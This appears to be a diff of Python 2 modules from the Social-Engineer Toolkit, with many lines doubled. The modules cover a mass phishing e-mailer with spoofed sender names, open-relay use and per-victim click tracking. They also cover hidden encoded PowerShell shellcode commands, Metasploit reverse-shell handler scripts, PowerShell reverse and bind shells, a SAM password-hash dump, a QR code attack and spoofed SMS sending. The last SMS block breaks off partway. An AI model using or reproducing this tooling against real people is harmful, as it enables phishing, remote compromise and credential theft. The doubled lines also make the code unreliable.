# Search for SMTP provider we will be using
match1=re.search("EMAIL_PROVIDER=", line)
if match1:
# Search for SMTP provider we will be using
match1=re.search("EMAIL_PROVIDER=", line)
if match1:
# if we hit on EMAIL PROVIDER
email_provider=line.replace("EMAIL_PROVIDER=", "").lower()
# if we hit on EMAIL PROVIDER
email_provider=line.replace("EMAIL_PROVIDER=", "").lower()
# support smtp for gmail
if email_provider == "gmail":
if sendmail == 0:
smtp = ("smtp.gmail.com")
port = ("587")
# support smtp for gmail
if email_provider == "gmail":
if sendmail == 0:
smtp = ("smtp.gmail.com")
port = ("587")
# support smtp for yahoo
if email_provider == "yahoo":
if sendmail == 0:
smtp = ("smtp.mail.yahoo.com")
port = ("25")
# support smtp for yahoo
if email_provider == "yahoo":
if sendmail == 0:
smtp = ("smtp.mail.yahoo.com")
port = ("25")
# support smtp for hotmail
if email_provider == "hotmail":
if sendmail == 0:
smtp = ("smtp.hotmail.com")
port = ("25")
# support smtp for hotmail
if email_provider == "hotmail":
if sendmail == 0:
smtp = ("smtp.hotmail.com")
port = ("25")
print ("""
Social Engineer Toolkit Mass E-Mailer
@ -100,135 +100,135 @@ print ("""
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
99. Return to main menu.
""")
option1=raw_input(setprompt(["5"], ""))
if option1 == 'exit':
exit_set()
exit_set()
# single email
if option1 == '1':
to = raw_input(setprompt(["1"], "Send email to"))
to = raw_input(setprompt(["1"], "Send email to"))
# mass emailer
if option1 == '2':
print ("""
The mass emailer will allow you to send emails to multiple
individuals in a list. The format is simple, it will email
based off of a line. So it should look like the following:
print ("""
The mass emailer will allow you to send emails to multiple
individuals in a list. The format is simple, it will email
based off of a line. So it should look like the following:
john.doe@ihazemail.com
jane.doe@ihazemail.com
wayne.doe@ihazemail.com
john.doe@ihazemail.com
jane.doe@ihazemail.com
wayne.doe@ihazemail.com
This will continue through until it reaches the end of the
file. You will need to specify where the file is, for example
if its in the SET folder, just specify filename.txt (or whatever
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt
""")
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
if not os.path.isfile(filepath):
while 1:
print "[!] File not found! Please try again and enter the FULL path to the file."
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
if os.path.isfile(filepath):
break
This will continue through until it reaches the end of the
file. You will need to specify where the file is, for example
if its in the SET folder, just specify filename.txt (or whatever
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt
""")
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
if not os.path.isfile(filepath):
while 1:
print "[!] File not found! Please try again and enter the FULL path to the file."
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
if os.path.isfile(filepath):
break
# exit mass mailer menu
if option1 == '99':
print "Returning to main menu..."
sys.exit(1)
print ("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider))
if option1 == '99':
print "Returning to main menu..."
sys.exit(1)
print ("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider))
relay = raw_input(setprompt(["1"], ""))
counter=0
# Specify mail Option Here
if relay == '1':
user = raw_input(setprompt(["1"], "Your %s email address" % (email_provider)))
from_address = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
user1 = user
pwd = getpass.getpass("Email password: ")
user = raw_input(setprompt(["1"], "Your %s email address" % (email_provider)))
from_address = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
user1 = user
pwd = getpass.getpass("Email password: ")
# Specify Open-Relay Option Here
if relay == '2':
user1 = raw_input(setprompt(["1"], "From address (ex: moo@example.com)"))
from_address = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
if sendmail==0:
user = raw_input(setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")
user1 = raw_input(setprompt(["1"], "From address (ex: moo@example.com)"))
from_address = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
if sendmail==0:
user = raw_input(setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")
if sendmail==0:
smtp = raw_input(setprompt(["1"], "SMTP email server address (ex. smtp.youremailserveryouown.com)"))
port = raw_input(setprompt(["1"], "Port number for the SMTP server [25]"))
if port == "":
port = ("25")
if sendmail==0:
smtp = raw_input(setprompt(["1"], "SMTP email server address (ex. smtp.youremailserveryouown.com)"))
port = raw_input(setprompt(["1"], "Port number for the SMTP server [25]"))
if port == "":
port = ("25")
# specify if its a high priority or not
highpri=yesno_prompt(["1"], "Flag this message/s as high priority? [yes|no]")
if not "YES" in highpri:
prioflag1 = ""
prioflag2 = ""
prioflag1 = ""
prioflag2 = ""
else:
prioflag1 = ' 1 (Highest)'
prioflag2 = ' High'
prioflag1 = ' 1 (Highest)'
prioflag2 = ' High'
subject=raw_input(setprompt(["1"], "Email subject"))
try:
html_flag=raw_input(setprompt(["1"], "Send the message as html or plain? 'h' or 'p' [p]"))
html_flag=raw_input(setprompt(["1"], "Send the message as html or plain? 'h' or 'p' [p]"))
# if we are specifying plain or defaulting to plain
if html_flag == "" or html_flag == "p":
message_flag="plain"
# if we are specifying html
if html_flag == "h":
message_flag="html"
# start the body off blank
body = ""
## Here we start to check if we want to track users when they click
## essentially if this flag is turned on, a quick search and replace
## occurs via base64 encoding on the user name. that is then added
## during the def mail function call and the username is posted as
## part of the URL. When we check the users, they can be coorelated
## back to the individual user when they click the link.
# if we are specifying plain or defaulting to plain
if html_flag == "" or html_flag == "p":
message_flag="plain"
# if we are specifying html
if html_flag == "h":
message_flag="html"
# start the body off blank
body = ""
## Here we start to check if we want to track users when they click
## essentially if this flag is turned on, a quick search and replace
## occurs via base64 encoding on the user name. that is then added
## during the def mail function call and the username is posted as
## part of the URL. When we check the users, they can be coorelated
## back to the individual user when they click the link.
# track email is pulled dynamically from the config as TRACK_EMAIL_ADDRESSES
if track_email.lower() == "on":
print "You have specified to track user email accounts when they are sent. In"
print "order for this to work, you will need to specify the URL within the body"
print "of the email and where you would like to inject the base64 encoded name."
print "\nWhen a user clicks on the link, the URL Will post back to SET and track"
print "each of the users clicks and who the user was. As an example, say my SET"
print "website is hosted at http://www.trustedsec.com/index.php and I want to track users."
print "I would type below " + bcolors.BOLD + "http://www.trustedsec.com/index.php?INSERTUSERHERE" + bcolors.ENDC + ". Note that in"
print "order for SET to work, you will need to specify index.php?INSERTUSERHERE. That is the"
print "keyword that SET uses in order to replace the base name with the URL."
print "\nInsert the FULL url and the " + bcolors.BOLD + "INSERTUSERHERE" + bcolors.ENDC + "on where you want to insert the base64 name.\n\nNOTE: You must have a index.php and a ? mark seperating the user. YOU MUST USE PHP!"
print "\nNote that the actual URL does NOT need to contain index.php but has to be named that for the php code in Apache to work."
body=raw_input(setprompt(["1"], "Enter the body of the message, hit return for a new line. Control+c when finished"))
# track email is pulled dynamically from the config as TRACK_EMAIL_ADDRESSES
if track_email.lower() == "on":
print "You have specified to track user email accounts when they are sent. In"
print "order for this to work, you will need to specify the URL within the body"
print "of the email and where you would like to inject the base64 encoded name."
print "\nWhen a user clicks on the link, the URL Will post back to SET and track"
print "each of the users clicks and who the user was. As an example, say my SET"
print "website is hosted at http://www.trustedsec.com/index.php and I want to track users."
print "I would type below " + bcolors.BOLD + "http://www.trustedsec.com/index.php?INSERTUSERHERE" + bcolors.ENDC + ". Note that in"
print "order for SET to work, you will need to specify index.php?INSERTUSERHERE. That is the"
print "keyword that SET uses in order to replace the base name with the URL."
print "\nInsert the FULL url and the " + bcolors.BOLD + "INSERTUSERHERE" + bcolors.ENDC + "on where you want to insert the base64 name.\n\nNOTE: You must have a index.php and a ? mark seperating the user. YOU MUST USE PHP!"
print "\nNote that the actual URL does NOT need to contain index.php but has to be named that for the php code in Apache to work."
body=raw_input(setprompt(["1"], "Enter the body of the message, hit return for a new line. Control+c when finished"))
# loop through until they are finished with the body of the subject line
while body != 'exit':
try:
# loop through until they are finished with the body of the subject line
while body != 'exit':
try:
body+=("\n")
body+=raw_input("Next line of the body: ")
body+=("\n")
body+=raw_input("Next line of the body: ")
# except KeyboardInterrupts (control-c) and pass through.
except KeyboardInterrupt:
break
# except KeyboardInterrupts (control-c) and pass through.
except KeyboardInterrupt:
break
# if we are tracking emails, this is some cleanup and detection to see if they entered .html instead or didn't specify insertuserhere
if track_email.lower() == "on":
# here we replace url with .php if they made a mistake
body = body.replace(".html", ".php")
if not "?INSERTUSERHERE" in body:
print_error("You have track email to on however did not specify ?INSERTUSERHERE.")
print_error("Tracking of users will not work and is disabled. Please re-read the instructions.")
pause = raw_input("Press {" + bcolors.BOLD + "return" + bcolors.ENDC + "} to continue.")
# if we are tracking emails, this is some cleanup and detection to see if they entered .html instead or didn't specify insertuserhere
if track_email.lower() == "on":
# here we replace url with .php if they made a mistake
body = body.replace(".html", ".php")
if not "?INSERTUSERHERE" in body:
print_error("You have track email to on however did not specify ?INSERTUSERHERE.")
print_error("Tracking of users will not work and is disabled. Please re-read the instructions.")
pause = raw_input("Press {" + bcolors.BOLD + "return" + bcolors.ENDC + "} to continue.")
# except KeyboardInterrupts (control-c) and pass through.
@ -237,77 +237,77 @@ except KeyboardInterrupt:
def mail(to, subject, prioflag1, prioflag2, text):
msg = MIMEMultipart()
msg['From'] = from_address
msg['To'] = to
msg['X-Priority'] = prioflag1
msg['X-MSMail-Priority'] = prioflag2
msg['Subject'] = subject
msg = MIMEMultipart()
msg['From'] = from_address
msg['To'] = to
msg['X-Priority'] = prioflag1
msg['X-MSMail-Priority'] = prioflag2
msg['Subject'] = subject
body_type=MIMEText(text, "%s" % (message_flag))
msg.attach(body_type)
body_type=MIMEText(text, "%s" % (message_flag))
msg.attach(body_type)
mailServer = smtplib.SMTP(smtp, port)
mailServer = smtplib.SMTP(smtp, port)
if sendmail == 0:
if sendmail == 0:
if email_provider == "gmail":
try:
mailServer.starttls()
except:
pass
mailServer.ehlo()
if email_provider == "gmail":
try:
mailServer.starttls()
except:
pass
mailServer.ehlo()
else: mailServer.ehlo()
else: mailServer.ehlo()
try:
if user != "" or pwd != "":
mailServer.login(user, pwd)
mailServer.sendmail(user, to, msg.as_string())
try:
if user != "" or pwd != "":
mailServer.login(user, pwd)
mailServer.sendmail(user, to, msg.as_string())
except:
# try logging in with base64 encoding here
import base64
try:
mailServer.docmd("AUTH LOGIN", base64.b64encode(user))
mailServer.docmd(base64.b64encode(pwd), "")
except:
# try logging in with base64 encoding here
import base64
try:
mailServer.docmd("AUTH LOGIN", base64.b64encode(user))
mailServer.docmd(base64.b64encode(pwd), "")
# except exceptions and print incorrect passowrd
except Exception, e:
print_warning("It appears your password was incorrect.\nPrinting response: "+(str(e)))
return_continue()
# except exceptions and print incorrect passowrd
except Exception, e:
print_warning("It appears your password was incorrect.\nPrinting response: "+(str(e)))
return_continue()
if sendmail == 1:
mailServer.sendmail,(user, to, msg.as_string())
if sendmail == 1:
mailServer.sendmail,(user, to, msg.as_string())
# if we specified a single address
if option1 == '1':
# re-assign body to temporary variable to not overwrite original body
body_new = body
## if we specify to track users, this will replace the INSERTUSERHERE with the "TO" field.
if track_email.lower() == "on":
body_new = body_new.replace("INSERTUSERHERE", base64.b64encode(to))
# call the function to send email
mail(to,subject,prioflag1,prioflag2,body_new)
# re-assign body to temporary variable to not overwrite original body
body_new = body
## if we specify to track users, this will replace the INSERTUSERHERE with the "TO" field.
if track_email.lower() == "on":
body_new = body_new.replace("INSERTUSERHERE", base64.b64encode(to))
# call the function to send email
mail(to,subject,prioflag1,prioflag2,body_new)
# if we specified the mass mailer for multiple users
if option1 == '2':
email_num=0
fileopen=file(filepath, "r").readlines()
for line in fileopen:
to = line.rstrip()
# re-assign body to temporary variable to not overwrite original body
body_new = body
## if we specify to track users, this will replace the INSERTUSERHERE with the "TO" field.
if track_email.lower() == "on":
body_new = body_new.replace("INSERTUSERHERE", base64.b64encode(to))
# send the actual email
time_delay = check_config("TIME_DELAY_EMAIL=").lower()
time.sleep(int(time_delay))
mail(to,subject,prioflag1,prioflag2,body_new)
email_num=email_num+1
# simply print the statement
print_status("Sent e-mail number: " + (str(email_num)) + " to address: " + to)
email_num=0
fileopen=file(filepath, "r").readlines()
for line in fileopen:
to = line.rstrip()
# re-assign body to temporary variable to not overwrite original body
body_new = body
## if we specify to track users, this will replace the INSERTUSERHERE with the "TO" field.
if track_email.lower() == "on":
body_new = body_new.replace("INSERTUSERHERE", base64.b64encode(to))
# send the actual email
time_delay = check_config("TIME_DELAY_EMAIL=").lower()
time.sleep(int(time_delay))
mail(to,subject,prioflag1,prioflag2,body_new)
email_num=email_num+1
# simply print the statement
print_status("Sent e-mail number: " + (str(email_num)) + " to address: " + to)
# finish up here
print_status("SET has finished sending the emails")


@ -15,121 +15,121 @@ show_powershell_menu = create_menu(text.powershell_text, text.powershell_menu)
powershell_menu_choice = raw_input(setprompt(["29"], ""))
if powershell_menu_choice != "99":
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
# if we select alphanumeric shellcode
if powershell_menu_choice == "1":
print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
# if we select alphanumeric shellcode
if powershell_menu_choice == "1":
# here we format everything for us
x64 = file("src/program_junk/x64.powershell", "r")
x64 = x64.read()
x64 = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + x64
x86 = file("src/program_junk/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + x86
print_status("If you want the powershell commands and attack, they are exported to reports/powershell/")
filewrite = file("reports/powershell/x64_powershell_injection.txt", "w")
filewrite.write(x64)
filewrite.close()
filewrite = file("reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
# grab port specifications
if check_options("PORT=") != 0:
port = check_options("PORT=")
print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
else:
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
update_options("PORT=" + port)
# here we format everything for us
x64 = file("src/program_junk/x64.powershell", "r")
x64 = x64.read()
x64 = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + x64
x86 = file("src/program_junk/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + x86
choice = yesno_prompt("0","Do you want to start the listener now [yes/no]: ")
if choice == 'NO':
pass
print_status("If you want the powershell commands and attack, they are exported to reports/powershell/")
filewrite = file("reports/powershell/x64_powershell_injection.txt", "w")
filewrite.write(x64)
filewrite.close()
filewrite = file("reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
# if we want to start the listener
if choice == 'YES':
victim = raw_input(setprompt(["29"], "Select x86 or x64 victim machine [default: x64]"))
if victim == "x86":
filewrite = file("reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
else:
filewrite = file("reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
msf_path = meta_path()
subprocess.Popen("ruby %s/msfconsole -L -n -r reports/powershell/powershell.rc" % (msf_path), shell=True).wait()
print_status("Powershell files can be found under reports/powershell/")
return_continue()
# if we select powershell reverse shell
if powershell_menu_choice == "2":
# prompt for IP address and port
port = raw_input(setprompt(["29"], "Enter the port for listener [443]"))
# default to 443
if port == "": port = "443"
# open the reverse shell up
print_status("Rewriting the powershell reverse shell with options")
fileopen = file("src/powershell/reverse.powershell", "r")
data = fileopen.read()
data = data.replace("IPADDRHERE", ipaddr)
data = data.replace("PORTHERE", port)
print_status("Exporting the powershell stuff to reports/powershell")
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
filewrite = file("reports/powershell/powershell.reverse.txt", "w")
filewrite.write(data)
filewrite.close()
choice = yesno_prompt("0","Do you want to start a listener [yes/no]")
if choice == "NO":
print_status("Have netcat or standard socket listener on port %s" % (port))
if choice == "YES":
socket_listener(port)
return_continue()
# grab port specifications
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if we select powershell bind shell
if powershell_menu_choice == "3":
port = raw_input(setprompt(["29"], "Enter the port for listener [443]"))
# open file
fileopen = file("src/powershell/bind.powershell", "r")
data = fileopen.read()
data = data.replace("PORTHERE", port)
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
filewrite = file("reports/powershell/powershell.bind.txt", "w")
filewrite.write(data)
filewrite.close()
print_status("The powershell program has been exported to reports/powershell/")
return_continue()
# if we select powershell powerdump SAM dump
if powershell_menu_choice == "4":
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
# copy file
if os.path.isfile("src/powershell/powerdump.encoded"):
shutil.copyfile("src/powershell/powerdump.encoded", "reports/powershell/powerdump.encoded.txt")
print_status("The powershell program has been exported to reports/powershell/")
print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.")
return_continue()
else:
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
update_options("PORT=" + port)
choice = yesno_prompt("0","Do you want to start the listener now [yes/no]: ")
if choice == 'NO':
pass
# if we want to start the listener
if choice == 'YES':
victim = raw_input(setprompt(["29"], "Select x86 or x64 victim machine [default: x64]"))
if victim == "x86":
filewrite = file("reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
else:
filewrite = file("reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
msf_path = meta_path()
subprocess.Popen("ruby %s/msfconsole -L -n -r reports/powershell/powershell.rc" % (msf_path), shell=True).wait()
print_status("Powershell files can be found under reports/powershell/")
return_continue()
# if we select powershell reverse shell
if powershell_menu_choice == "2":
# prompt for IP address and port
port = raw_input(setprompt(["29"], "Enter the port for listener [443]"))
# default to 443
if port == "": port = "443"
# open the reverse shell up
print_status("Rewriting the powershell reverse shell with options")
fileopen = file("src/powershell/reverse.powershell", "r")
data = fileopen.read()
data = data.replace("IPADDRHERE", ipaddr)
data = data.replace("PORTHERE", port)
print_status("Exporting the powershell stuff to reports/powershell")
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
filewrite = file("reports/powershell/powershell.reverse.txt", "w")
filewrite.write(data)
filewrite.close()
choice = yesno_prompt("0","Do you want to start a listener [yes/no]")
if choice == "NO":
print_status("Have netcat or standard socket listener on port %s" % (port))
if choice == "YES":
socket_listener(port)
return_continue()
# if we select powershell bind shell
if powershell_menu_choice == "3":
port = raw_input(setprompt(["29"], "Enter the port for listener [443]"))
# open file
fileopen = file("src/powershell/bind.powershell", "r")
data = fileopen.read()
data = data.replace("PORTHERE", port)
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
filewrite = file("reports/powershell/powershell.bind.txt", "w")
filewrite.write(data)
filewrite.close()
print_status("The powershell program has been exported to reports/powershell/")
return_continue()
# if we select powershell powerdump SAM dump
if powershell_menu_choice == "4":
# create the directory if it does not exist
if not os.path.isdir("reports/powershell"):
os.makedirs("reports/powershell")
# copy file
if os.path.isfile("src/powershell/powerdump.encoded"):
shutil.copyfile("src/powershell/powerdump.encoded", "reports/powershell/powerdump.encoded.txt")
print_status("The powershell program has been exported to reports/powershell/")
print_status("Note with PowerDump -- You MUST be running as SYSTEM when executing.")
return_continue()


@ -2,16 +2,16 @@ from src.qrcode.qrcode import *
from src.core.setcore import *
import os
# generate the qrcode and save it definition
# generate the qrcode and save it definition
def gen_qrcode(url):
# generate the qrcode
qr = QRCode(5, QRErrorCorrectLevel.L)
qr.addData(url)
qr.make()
im = qr.makeImage()
time.sleep(1)
if os.path.isfile("reports/qrcode_attack.png"): os.remove("reports/qrcode_attack.png")
# save the image out
im.save("reports/qrcode_attack.png", format='png')
# print that its been successful
print_status("[*] QRCode has been generated under reports/qrcode_attack.png!")
# generate the qrcode
qr = QRCode(5, QRErrorCorrectLevel.L)
qr.addData(url)
qr.make()
im = qr.makeImage()
time.sleep(1)
if os.path.isfile("reports/qrcode_attack.png"): os.remove("reports/qrcode_attack.png")
# save the image out
im.save("reports/qrcode_attack.png", format='png')
# print that its been successful
print_status("[*] QRCode has been generated under reports/qrcode_attack.png!")


@ -11,8 +11,8 @@ def send_sohoos_sms(to, origin, text):
conn = httplib.HTTPConnection('sohoos.com')
conn.request('POST', '/crm/managekit/widget/submitsms', params, headers)
response = conn.getresponse()
if (response.status == 302 and
response.reason == "Found" and
if (response.status == 302 and
response.reason == "Found" and
response.getheader("location") == "/crm/managekit/widget/thankssms"):
print "\nSMS sent\n"
else:
@ -35,7 +35,7 @@ def send_smsgang_sms(to, origin, text, pincode):
conn = httplib.HTTPConnection('www.smsgang.com')
conn.request('POST', '/sendsms.php?langfile=en', params, headers)
response = conn.getresponse()
if (response.status == 200 and
if (response.status == 200 and
re.search("Your SMS was sent", response.read())):
print "\nSMS sent\n"
else:
@ -52,7 +52,7 @@ def send_lleidanet_sms(to, origin, text, user, password, email):
conn = httplib.HTTPConnection('sms.lleida.net')
conn.request('POST', '/xmlapi/smsgw.cgi', params, headers)
response = conn.getresponse()
if (response.status == 200 and
if (response.status == 200 and
re.search("<status>100</status>", response.read())):
print "\nSMS sent\n"
else:
@ -76,4 +76,3 @@ def send_android_emu_sms(origin, text):
print "Try: http://developer.android.com/guide/developing/tools/emulator.html"
except:
print "\nError sending SMS"


@ -3,7 +3,7 @@ import random
from src.core import setcore as core
try:
print ("\n [****] Custom Template Generator [****]\n")
print ("\n [****] Custom Template Generator [****]\n")
author=raw_input(core.setprompt(["7"], "Name of the author"))
filename=randomgen=random.randrange(1,99999999999999999999)
filename=str(filename)+(".template")


@ -9,7 +9,7 @@ while 1:
print """
SMS Attack Menu
There are diferent attacks you can launch in the context of SMS spoofing,
There are diferent attacks you can launch in the context of SMS spoofing,
select your own.
1. SMS Attack Single Phone Number
@ -21,7 +21,7 @@ while 1:
if attack_option == 'exit':
core.exit_set()
# exit
# exit
if attack_option == '1':
print("\nSingle SMS Attack")
to = raw_input(core.setprompt(["7"], "Send sms to"))
@ -29,7 +29,7 @@ while 1:
phones.append(to)
sys.path.append("src/sms/client/")
try:
# ugly but "compliant" with SET architecture
# ugly but "compliant" with SET architecture
debug_msg(me,"importing 'src.sms.client.sms_launch'",1)
reload(sms_launch)
sms_launch.phones = phones
@ -37,7 +37,7 @@ while 1:
except:
import sms_launch
sms_launch.phones = phones
sms_launch.launch()
sms_launch.launch()
break
if attack_option == '2':
# TO DO: MASS SMS ATTACK
@ -55,15 +55,15 @@ while 1:
break
sys.path.append("src/sms/client/")
try:
# ugly but "compliant" with SET architecture
# ugly but "compliant" with SET architecture
debug_msg(me,"importing 'src.sms.client.sms_launch'",1)
reload(sms_launch)
sms_launch.phones = phones
sms_launch.launch()
except:
import sms_launch
import sms_launch
sms_launch.phones = phones
sms_launch.launch()
break
if attack_option == '99':
if attack_option == '99':
break


@ -7,155 +7,155 @@ import os
from src.core import setcore as core
def launch():
while 1:
print("""
1. Pre-Defined Template
2. One-Time Use SMS
99. Cancel and return to SMS Spoofing Menu
""")
template_choice = raw_input(core.setprompt(["7"], "Use a predefined template or craft a one time SMS?"))
# if predefined template go here
if template_choice == '1':
# set path for
path = 'src/templates/sms/'
filewrite=file("src/program_junk/sms.templates", "w")
counter=0
# Pull all files in the templates directory
for infile in glob.glob(os.path.join(path, '*.template')):
infile=infile.split("/")
# grab just the filename
infile=infile[3]
counter=counter+1
# put it in a format we can use later in a file
filewrite.write(infile+" "+str(counter)+"\n")
# close the file
filewrite.close()
# read in formatted filenames
fileread=file("src/program_junk/sms.templates","r").readlines()
print "Below is a list of available templates:\n"
for line in fileread:
line=line.rstrip()
line=line.split(" ")
filename=line[0]
# read in file
fileread2=file("src/templates/sms/%s" % (filename),"r").readlines()
for line2 in fileread2:
match=re.search("SUBJECT=", line2)
if match:
line2=line2.rstrip()
line2=line2.split("=")
line2=line2[1]
# strip double quotes
line2=line2.replace('"', "")
# display results back
print line[1]+": "+line2
# allow user to select template
choice=raw_input(core.setprompt(["7"], "Select template"))
for line in fileread:
# split based off of space
line=line.split(" ")
# search for the choice
match=re.search(str(choice), line[1])
if match:
extract=line[0]
fileopen=file("src/templates/sms/"+str(extract), "r").readlines()
for line2 in fileopen:
match2=re.search("ORIGIN=", line2)
if match2:
origin=line2.replace('"', "")
origin=origin.split("=")
origin=origin[1]
match3=re.search("SUBJECT=", line2)
if match3:
subject=line2.replace('"', "")
subject=subject.split("=")
subject=subject[1]
match4=re.search("BODY=", line2)
if match4:
body=line2.replace('"', "")
body=body.replace(r'\n', " \n ")
body=body.split("=")
body=body[1]
break;
if template_choice == '2':
try:
origin = raw_input(core.setprompt(["7"], "Source number phone"))
body = raw_input(core.setprompt(["7"], "Body of the message, hit return for a new line. Control+c when finished"))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body+=("\n")
body+=raw_input("Next line of the body: ")
except KeyboardInterrupt: break
except KeyboardInterrupt: pass
break;
if template_choice == '99':
break;
if template_choice != '3':
while 1:
print("""
1. Pre-Defined Template
2. One-Time Use SMS
print("""
Service Selection
99. Cancel and return to SMS Spoofing Menu
There are diferent services you can use for the SMS spoofing, select
your own.
1. SohoOS (buggy)
2. Lleida.net (pay)
3. SMSGANG (pay)
4. Android Emulator (need to install Android Emulator)
99. Cancel and return to SMS Spoofing Menu
""")
template_choice = raw_input(core.setprompt(["7"], "Use a predefined template or craft a one time SMS?"))
# if predefined template go here
if template_choice == '1':
# set path for
path = 'src/templates/sms/'
filewrite=file("src/program_junk/sms.templates", "w")
counter=0
# Pull all files in the templates directory
for infile in glob.glob(os.path.join(path, '*.template')):
infile=infile.split("/")
# grab just the filename
infile=infile[3]
counter=counter+1
# put it in a format we can use later in a file
filewrite.write(infile+" "+str(counter)+"\n")
# close the file
filewrite.close()
# read in formatted filenames
fileread=file("src/program_junk/sms.templates","r").readlines()
print "Below is a list of available templates:\n"
for line in fileread:
line=line.rstrip()
line=line.split(" ")
filename=line[0]
# read in file
fileread2=file("src/templates/sms/%s" % (filename),"r").readlines()
for line2 in fileread2:
match=re.search("SUBJECT=", line2)
if match:
line2=line2.rstrip()
line2=line2.split("=")
line2=line2[1]
# strip double quotes
line2=line2.replace('"', "")
# display results back
print line[1]+": "+line2
service_option = raw_input(core.setprompt(["7"], ""))
# exit
if service_option == '1':
break
if service_option == '2':
break
if service_option == '3':
break
if service_option == '4':
break
if service_option == '99':
break
# allow user to select template
choice=raw_input(core.setprompt(["7"], "Select template"))
for line in fileread:
# split based off of space
line=line.split(" ")
# search for the choice
match=re.search(str(choice), line[1])
if match:
extract=line[0]
fileopen=file("src/templates/sms/"+str(extract), "r").readlines()
for line2 in fileopen:
match2=re.search("ORIGIN=", line2)
if match2:
origin=line2.replace('"', "")
origin=origin.split("=")
origin=origin[1]
match3=re.search("SUBJECT=", line2)
if match3:
subject=line2.replace('"', "")
subject=subject.split("=")
subject=subject[1]
match4=re.search("BODY=", line2)
if match4:
body=line2.replace('"', "")
body=body.replace(r'\n', " \n ")
body=body.split("=")
body=body[1]
if template_choice != '3' and service_option != '99':
#sohoOS service
if service_option == '1':
for to in phones:
send_sohoos_sms(to.rstrip(), origin.rstrip(), body.rstrip())
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
break;
if template_choice == '2':
try:
origin = raw_input(core.setprompt(["7"], "Source number phone"))
body = raw_input(core.setprompt(["7"], "Body of the message, hit return for a new line. Control+c when finished"))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body+=("\n")
body+=raw_input("Next line of the body: ")
except KeyboardInterrupt: break
except KeyboardInterrupt: pass
break;
#Lleida.net service
if service_option == '2':
user = raw_input(core.setprompt(["7"], "Your Lleida.net user"))
password = raw_input(core.setprompt(["7"], "Your Lleida.net password"))
email = raw_input(core.setprompt(["7"], "Email for the receipt (optional)"))
for to in phones:
send_lleidanet_sms(to.rstrip(), origin.rstrip(), body.rstrip(), user, password, email)
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
if template_choice == '99':
break;
#SMSGANG service
if service_option == '3':
pincode = raw_input(core.setprompt(["7"], "Your SMSGANG pincode"))
for to in phones:
send_smsgang_sms(to.rstrip(), origin.rstrip(), body.rstrip(), pincode)
# Finish here then return to main menu
core.print_status("SET has completed!")
core.return_continue()
if template_choice != '3':
while 1:
print("""
Service Selection
There are diferent services you can use for the SMS spoofing, select
your own.
1. SohoOS (buggy)
2. Lleida.net (pay)
3. SMSGANG (pay)
4. Android Emulator (need to install Android Emulator)
99. Cancel and return to SMS Spoofing Menu
""")
service_option = raw_input(core.setprompt(["7"], ""))
# exit
if service_option == '1':
break
if service_option == '2':
break
if service_option == '3':
break
if service_option == '4':
break
if service_option == '99':
break
if template_choice != '3' and service_option != '99':
#sohoOS service
if service_option == '1':
for to in phones:
